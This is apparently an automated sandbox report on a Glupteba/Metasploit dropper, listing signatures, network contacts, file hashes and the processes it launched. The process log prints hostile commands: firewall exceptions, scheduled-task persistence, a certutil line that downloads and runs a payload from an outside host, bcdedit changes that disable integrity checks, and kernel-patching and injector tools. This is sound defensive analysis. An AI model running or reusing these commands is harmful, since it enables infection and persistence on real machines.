Malware Analysis Report

2025-08-05 12:47

Sample ID 240122-vpvjzsahem
Target 6fd9d52463f7b9444ae84fccccc96a3b
SHA256 7bec73f4ea2b19439f13212e476245d88a0cf3da3a90cb27d684614e0a5affef
Tags
glupteba metasploit backdoor dropper evasion loader ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7bec73f4ea2b19439f13212e476245d88a0cf3da3a90cb27d684614e0a5affef

Threat Level: Known bad

The file 6fd9d52463f7b9444ae84fccccc96a3b was found to be: Known bad.

Malicious Activity Summary

glupteba metasploit backdoor dropper evasion loader ransomware trojan

Glupteba payload

MetaSploit

Glupteba

Modifies boot configuration data using bcdedit

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Unsigned PE

Program crash

GoLang User-Agent

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-22 17:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-22 17:10

Reported

2024-01-22 17:13

Platform

win7-20231215-en

Max time kernel

0s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122171030.log C:\Windows\Logs\CBS\CbsPersist_20240122171030.cab

C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe ""

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 ninhaine.com udp
US 8.8.8.8:53 2makestorage.com udp
US 8.8.8.8:53 nisdably.com udp
US 8.8.8.8:53 588d1572-2c5b-44f0-a191-4c6a741bfc76.ninhaine.com udp
US 8.8.8.8:53 server12.ninhaine.com udp
CZ 46.8.8.100:443 server12.ninhaine.com tcp
CZ 46.8.8.100:443 server12.ninhaine.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
GB 96.17.179.205:80 apps.identrust.com tcp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 ww82.ninhaine.com udp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
CZ 46.8.8.100:443 server12.ninhaine.com tcp
US 8.8.8.8:53 spolaect.info udp
CZ 46.8.8.100:443 server12.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
CZ 46.8.8.100:443 server12.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 server12.2makestorage.com udp

Files

memory/1668-0-0x00000000049F0000-0x0000000004E2C000-memory.dmp

memory/1668-1-0x00000000049F0000-0x0000000004E2C000-memory.dmp

memory/1668-2-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/1668-3-0x0000000004E30000-0x0000000005756000-memory.dmp

memory/2624-5-0x0000000004970000-0x0000000004DAC000-memory.dmp

memory/1668-4-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/1668-6-0x00000000049F0000-0x0000000004E2C000-memory.dmp

memory/2624-7-0x0000000004970000-0x0000000004DAC000-memory.dmp

memory/2624-8-0x0000000004DB0000-0x00000000056D6000-memory.dmp

memory/2624-9-0x0000000000400000-0x00000000030EF000-memory.dmp

\Windows\rss\csrss.exe

MD5 e0a64fe867395c4cee64c8c7feafd622
SHA1 bc4782ed2ffbeb6914965c5ee812002fdae05df9
SHA256 29e8d37ff092ff8453cf0b4ffd1d6534d3b3108ac4ddc4b4f81bd717489d98d7
SHA512 d03e328bbcb7913e2c137d33237bd8c375893f98bb92f8d9690d2540b7b56828a4c3b08632f027df8ffeab276f38239acd692e821830b1df5a13500218560836

C:\Windows\rss\csrss.exe

MD5 5fc8eddd8c87b4be855b21f7015109c5
SHA1 1b2b802c289f770d16b4678d648630ee48f1384a
SHA256 530f26a68f4d28df80848c88bf421171a3b42f883e2f7adee89a2682b74d3ae1
SHA512 4431adb2d4fabdf349d94c82cb331cfe74a4498d6aec5955057a989c4f0320970da151d31422e7bd11d0c834ce46aaccdf3c0291005915d26392557475470cec

\Windows\rss\csrss.exe

MD5 533126d85b3161ba22398edc770f92fa
SHA1 fc3c9c15bea72157b33bf10936dddd8c8195605a
SHA256 903bc1efcd6b200fc06d1f58630cb06a1564af04b75ebf7072a40a1c4fb48f44
SHA512 c094910ab8ecc773e88fe6cc888a0b48865768146212e4f42cc55182ad2ce1c594e8080609732ee7ca0ce117a88625d484589ba4e6dd79f7f74afa18867c504f

C:\Windows\rss\csrss.exe

MD5 b00ed00494ee57e6c52e15350a87642d
SHA1 670ea4ca841bb15c49c75a13f87dcab906a3523d
SHA256 b74e8efc5f5083292415fe25813ea0e32206b24f25003646ddbabb25a9c12114
SHA512 a8c9c8dd39bbf5c27d1f5f4895e3084c6a619a6243d09af56e12ffdc997b5c2783c670b88512f21c9bc61f01428473d4b15ac57870f6d3f88f431ac487c191b6

memory/3000-19-0x0000000004990000-0x0000000004DCC000-memory.dmp

memory/2624-18-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/2624-20-0x0000000004970000-0x0000000004DAC000-memory.dmp

memory/3000-21-0x0000000004990000-0x0000000004DCC000-memory.dmp

memory/3000-22-0x0000000000400000-0x00000000030EF000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 8c3add78367cbbcfc0e469398610b0ab
SHA1 ee8b434d96bb2af3846fd18b46676113a942da92
SHA256 47656a063da9c5c670f02ae9e2ea77710e68408e041d3d1f58e7fb0f6491ec4e
SHA512 5d30d97d3a3213c0d1f83d5afe2b25e9a22cfd3653e6647eafc8749be13302dfb9ae00fb295bb272fd687ff8690de1676d673b1d51b201556058da7651b17334

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 2b3fb437d2aa195969805824a421e698
SHA1 191321a74c1c114180a249f8fb0f0001a0f40909
SHA256 2bc9e33c524cfd1d51589932721a0cec3fde6f09bb7939d4cd8cb17633b2eb9a
SHA512 bb98943cf012f04132c4f05b2f39a7260ad9ac4bedd44032970098a7e30fc101f5c188c136ea6c3c4c0feda62d42055885d5dbcfb047c5cd64687d14bf1cd546

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 cb70c7f3923cb7fe161c13e3465b7a5d
SHA1 f96d862b9d1a8f5779fcc9dba83b66988a8a5a55
SHA256 d157a3ad1f1e6a780830ca318f58e753c8dccc26d3f173f621b1bbd61c658ea6
SHA512 9fc5e05123db47c51571a93abafb84a80119a7d512416b94ed2190bc717617f89a54fc614db85f01b714686670969e800dc9cd8d0fff594130cf42a247ff7bdb

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 55b3d29babe9a022063ce6037c67c02d
SHA1 9ef776ea47a1adccde9ad035f2d9b2689541236c
SHA256 d040c60cdb6702030b1168a1d3f50d3c19922b24625cf08aee60a23a83b3c267
SHA512 2b248881511c926a4366beb8e543f6a34408ea83611799ffd46ff42f23d53a609f3d8e43d528a473a9306e6363d5f98f7166004827c634c48d2a08b24096a7ae

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 76353b3230a8d5f0edb8236f39be76ac
SHA1 0366d61ae5400da73ee94e382c92ff4f0f6c0336
SHA256 8fee315c8e4a0116d4d17a6eda2481a6c7e4384a7f2e38dab8218d38d2390e84
SHA512 186a4a1948fd788b058631b57a548b769d5fb2bbfda0ac965b8fd9e0e788137d81ceed1dabb383f871c640c48a842e23b1c5c4e0b95e8be92e91826980276539

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 924095796173147e9bcab57734f24b20
SHA1 0acedbff078dc3e7745dfa6088893364547f7721
SHA256 9de62ba25d6d333413ef942de6b23681d477e516f0d5bfecda89ef867bbe1e25
SHA512 c9cd8734df658ea571628c47262dba4a56a7ec8c15eeed5c26d9144a4b78a98e5ca67e49d3083f90e6c9672621e22017aa9746672ba3b574a5080d701a1d247b

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 9e283d09b2dfb3bbdad30ec5fda4d7fb
SHA1 fe357fab7abd3e938025bfe660ce704c34778251
SHA256 8f85a21bc4144c28f03499568f81ba153be9fdce158251d6d21bd4a6c37b2f8f
SHA512 54f149b392eaa4990f3b5809835583d60fc988da41c0c37941a442d1438dde4c8ce4e5ab99d7fca785a081c499d0090c7b3ff4d6e89712a9fb0b045e908062ae

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 ec95ca03114bfe923aac5eee16bf6a3f
SHA1 83e872e217104770876cba544b6a2c9a3c8f8455
SHA256 03173ddc1f16447a6f52e9a6858e952cec07bdcee4b922be071a837939af173e
SHA512 78ccc66935bd7451e2136cb960390ad961c8f08e125410b555bcf20357c71f466f94100803103d6d950062e27ef429569f1c588778d61120f532fe793246031c

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 03e03703fe5fc79e7f1d5e44e3c27b1e
SHA1 8f25ba10b5e479ae63c4c3867475502e1a6499fa
SHA256 504111bf8fb1386663a5f92bab46dc7b1171fb9c9a8b8cd100945a6c6bde311e
SHA512 1926c83c1f301800c289b16458ae30bc0927b231a5b11b12663d8a608c5ded27d8d73987ec6af46011e2f2b4e7e4c65fa7cfd50e5370d00e47784982874b88fa

memory/1868-43-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/1868-29-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar2119.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 44e942e56ad71912f4cdbdff8dbb983e
SHA1 2e3c9c018527b8e5f98e333d91bc26386c0dfc0e
SHA256 ccf4e6a578d687272a02dc32fba92e3c65e2b481974b9b8a3a0c3c03be8a0e14
SHA512 ea428a0dd1263ff64e9d6422ea632833cf67e064827a9438e217c4b1b2226789447a98bd6bf591ee929426a937bdfeb4c70eadbebf348afa265a39df9f89628f

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 3c1815ec1c06f8acd9081d59420400a1
SHA1 f439cb394e9d3abc15d2ae48fc07eac858603a24
SHA256 acad7cb2cabbb86e6fa636522c9b8c979e30b0d8238f246412bf2a734cac5ea5
SHA512 d99669c8d2fa2a37cd50768db21b07cd1b4659dabf94e3956fb44c74d885f49139654bbdaba571c7f3154f79536b90607ba597c073652ec361aa9802ed7a3789

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d562af68231088c295a5b09de3cbcb39
SHA1 5944cd71d6f21bae4a9319d1aa404689f37eccc9
SHA256 2cee86596ef577012a627e8dcade8ce31fb7629a26860e7b4a515d5448cfec2c
SHA512 8ac91cab45784733013c4689377d620a575c2f0862b78bf3cafe65d8f91ebab16483335ba7c620142055e812d62549b845c16038a14f9b35487f2dd76dd7649a

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0d1d181084a526819f4dc38f2c911737
SHA1 ccde1f0aab4c945b6877819a48a047b11b33f4e0
SHA256 ad66c0d0561f38e3022fdc7c6f6bf4192b2c21f95b9451dcb309523255a0de0c
SHA512 0d301c376d076ed7f69b4fc5e3c6841f4626ff347a811d69a657b22a042b45b65fdad17ec2ead2a774e8004f26ebcd24e822aed78614c2a37517a758433837cc

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

MD5 d4ae187b4574036c2d76b6df8a8c1a30
SHA1 b06f409fa14bab33cbaf4a37811b8740b624d9e5
SHA256 a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7
SHA512 1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

memory/3000-258-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/3000-259-0x0000000004990000-0x0000000004DCC000-memory.dmp

memory/3000-260-0x0000000000400000-0x00000000030EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 c9b01a86e63bca4272d6629df216a696
SHA1 0c1a515ca60ca432e7163ec59e9cbb93d12cf84e
SHA256 12e7e556c8c534b4b9e3a772ec266e48b15f92461fb68d8c75a7bc062b21519d
SHA512 7872033f755cb77fd7d46a02b6424ce3deebc9163b4841dafbb0dc42ee5f4246ca574109bcd9c458bddeaab924b2dfc6d447ca3ea102eb86d040a76041188295

memory/3000-263-0x0000000000400000-0x00000000030EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 435bdbda10a0eaeac0e7d33781be1837
SHA1 cdc07e5c82990eecb1f1de5f8d97ffe9cb908cdb
SHA256 9f0a2d4f0150f4c40d9a074e0bcd06d1db3e2bc5b5515e7783904d4b042450e4
SHA512 416990e39a3726596bd7dd3bb70cbc9b08c47bd48d2e621c70616cc09a1fc556b9d41eb325dcc54cee1a1fb8d2affcf1aa2032f50db3bbb6db6a7634d487de8c

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 02e5f16910a4349358aed053b51a3bf1
SHA1 48caa92048187c8c45820c73d51d45cc21d2cf66
SHA256 51aa341ecd7d28e009494df17df0af56f66791ad9385b643a1680de2af6254b8
SHA512 c3e9b1d809492a65ad4fda034bc66fd189adc1ff114c953ddcb7f6b13286dc11a76ed83771d174ac847066c21480deffd9774e073e3e2c5de6fd5080732c546e

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 ba28e2a2f186d232d0cb8784041b65ae
SHA1 fdb5c6bd907e4990970c7fc6cd2d7a1d84e52e08
SHA256 4bde582e142fd8de63c022b2d8962998308fd6a5e459d0fedfc251464f4667df
SHA512 5c353cf7f00213c0c5a0d25fecaf56b76c1d61b39e0bc18275de216193c249e222fae6ac0e39ed1d9b47f4a33095ee9a57a7fc1a0d4acb9ea9246694f254f089

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 d97ea8f8b9f71bbbe784f5b118178a45
SHA1 823784b6701dcfdb65a933c181759993d8a114c1
SHA256 3bd5cbd6f7af5f903656bfd4b6c3a1a11d111480bf1ae58373df7b85705602d5
SHA512 9a9f67ca22bd9fa1b6ee60f0bf1d033aaeb71d3c85e2ead77e79d71e011a22ea26555177e69e1ba36a1cdf9e3eb9836d69590603c6947f716e46b87910f5d5ec

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 32fd525da503cb69f7f1629ee58d2e32
SHA1 fa3a87ed98b0e048a63fa59652c2d71f7f82187f
SHA256 239be51515c362328aefa4bef8dc4b0f16ada5d10bc41ced0a64093173d60be5
SHA512 5864560a9a9adec4b48eaa28edfbb2efd00eaa704fe5cc5c4b2431e718bf88f1e7d331756cc09e125bd07a4b4f3b32abbf847082c2867373369c72a9bbce51ff

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

memory/3000-314-0x0000000000400000-0x00000000030EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 15294aac39d43bdadb3cbe422a656a77
SHA1 debb2fb31abff11aaf7ad03010c133628a345e70
SHA256 ec9a6e9b9f4933bebacb3eb8824f94f04024e09ac3e408614d48f301fef6cf8f
SHA512 dd2f31fa0039609068bc2b1086fc82944969d02f14d16d231a0aa06b9dae4dabc0414610541976c6e47d7d552664a024f51e096a08b04e708898d72743dfbde3

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 034bccff31f9b5930b1a405d88bbc79e
SHA1 e9aaba0aa4e00562a2a68316109001274b844003
SHA256 fc26c36ff97f9a5d0d8a925c72cb963123d3013a69eab9086b40afeffa1fb622
SHA512 6994168753129e4a1a5d52d762fc2a5c1b041d013b9620f63f76198dc9bc927056c5b8d25ecdbb680e4a82cf9d6ed83de264223d365f898d57ae139a1c3208ab

memory/3000-344-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/3000-345-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/3000-346-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/3000-371-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/3000-372-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/3000-373-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/3000-374-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/3000-375-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/3000-376-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/3000-377-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/3000-378-0x0000000000400000-0x00000000030EF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-22 17:10

Reported

2024-01-22 17:13

Platform

win10v2004-20231215-en

Max time kernel

3s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
